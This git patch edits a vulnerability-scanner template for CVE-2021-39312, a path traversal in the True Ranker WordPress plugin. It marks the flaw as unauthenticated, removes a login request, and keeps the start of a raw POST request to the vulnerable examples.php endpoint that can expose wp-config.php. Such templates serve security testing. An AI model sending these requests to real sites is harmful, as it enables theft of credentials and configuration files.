From 101f0e4607a1d2e200529a12bea7aea857a9ca4b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 1 May 2022 16:10:55 +0530 Subject: [PATCH] Update CVE-2021-39312.yaml --- cves/2021/CVE-2021-39312.yaml | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-39312.yaml b/cves/2021/CVE-2021-39312.yaml index fbfdc9a0fa..6e2b58b2f2 100644 --- a/cves/2021/CVE-2021-39312.yaml +++ b/cves/2021/CVE-2021-39312.yaml @@ -1,7 +1,7 @@ id: CVE-2021-39312 info: - name: True Ranker < 2.2.4 - Authenticated Arbitrary File Access via Path Traversal + name: True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal author: DhiyaneshDK severity: high description: The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file. @@ -13,14 +13,6 @@ info: requests: - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1 Host: {{Hostname}}